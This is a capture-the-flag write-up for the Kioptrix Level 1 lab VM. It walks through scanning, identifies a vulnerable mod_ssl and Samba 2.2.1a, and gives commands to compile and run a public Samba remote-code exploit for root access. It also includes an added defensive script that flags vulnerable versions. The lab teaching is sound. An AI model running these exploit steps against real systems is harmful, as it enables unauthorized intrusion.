Kioptrix: Level 1

This is my writeup for the Kioptrix Level 1 VM from It's considered easy. The object of the game is to acquire root access via any means possible. There is more than one way to successfully complete the challenges.

Intelligence Gathering

Let's do a nmap_fast scan.


We now have a list of ports. When we access the IP of the VM on port 80, we see a test page for the Apache Web Server.


Let's see what nikto finds on this webserver.



One interesting part is a vulnerability in mod_ssl which may allow a remote shell:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell., OSVDB-756.

Asking Google for "OSVDB-756" returns a lot of results regarding OpenFuck, which targets mod_ssl. There is even a step-by-step guide for updating the old exploit to work with the newer OpenSSL library files. We need to change the link to the exploit as well.


From the nmap scan we can see that Samba runs on port 139. Let's have a closer look.

Running enum4linux tells us that Samba 2.2.1a is installed.

[+] Got OS info for from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for from srvinfo:
	KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
	platform_id     :	500
	os version      :	4.5
	server type     :	0x9a03
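
The two version strings found above (the mod_ssl token in the web server banner and the Samba version in the enum4linux output) are exactly what a defender would want to catch in an inventory of their own hosts. The following is an added example, not part of the original writeup: the sample lines, the address 192.0.2.10, and the function and status names are constructed for illustration, and the only threshold used is the "2.8.7 and lower" from the nikto finding.

```python
import re

# Threshold from the nikto finding quoted above:
# "mod_ssl 2.8.7 and lower are vulnerable".
MOD_SSL_LAST_VULNERABLE = (2, 8, 7)
# The writeup searches searchsploit for "samba 2.2"; flag that series for review.
SAMBA_SERIES_OF_INTEREST = (2, 2)

MOD_SSL_RE = re.compile(r"\bmod_ssl/(\d+(?:\.\d+)*)")
SAMBA_RE = re.compile(r"Server=\[Samba (\d+(?:\.\d+)*)([a-z]?)\]")


def version_tuple(text):
    """Turn '2.8.10' into (2, 8, 10) so versions compare numerically,
    not as strings (as strings, '2.8.10' would sort before '2.8.7')."""
    return tuple(int(part) for part in text.split("."))


def audit_banner(line):
    """Return (component, version, status) tuples for one banner/tool line."""
    findings = []
    m = MOD_SSL_RE.search(line)
    if m:
        in_range = version_tuple(m.group(1)) <= MOD_SSL_LAST_VULNERABLE
        status = "vulnerable-range" if in_range else "above-range"
        findings.append(("mod_ssl", m.group(1), status))
    m = SAMBA_RE.search(line)
    if m:
        series = version_tuple(m.group(1))[:2]
        hit = series == SAMBA_SERIES_OF_INTEREST
        status = "review-2.2-series" if hit else "not-assessed"
        findings.append(("samba", m.group(1) + m.group(2), status))
    return findings


# Constructed sample input: two HTTP Server headers, one enum4linux line,
# and one line with nothing to report.
SAMPLES = [
    "Server: Apache (Unix) mod_ssl/2.8.4",
    "Server: Apache (Unix) mod_ssl/2.8.10",
    "[+] Got OS info for 192.0.2.10 from smbclient: "
    "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]",
    "Server: nginx",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(audit_banner(sample), "<-", sample)
```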

We use searchsploit to find exploits for this version.

$ searchsploit samba 2.2



After updating the exploit, we run it against our victim.


The flag is located in one of the mails for root:

$ mail 

Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
To: [email protected]
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...


Let's use the RCE exploit. First we copy the exploit to our working directory:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

Next we need to compile it and make it executable:

$ gcc -o samba_exploit exploit.c
$ chmod +x samba_exploit

Then we run the exploit against our victim (-b is platform selection):

$ ./samba_exploit -b 0 __IP__


Kioptrix: Level 1 is a good way to get started with scanning and running prewritten exploits.
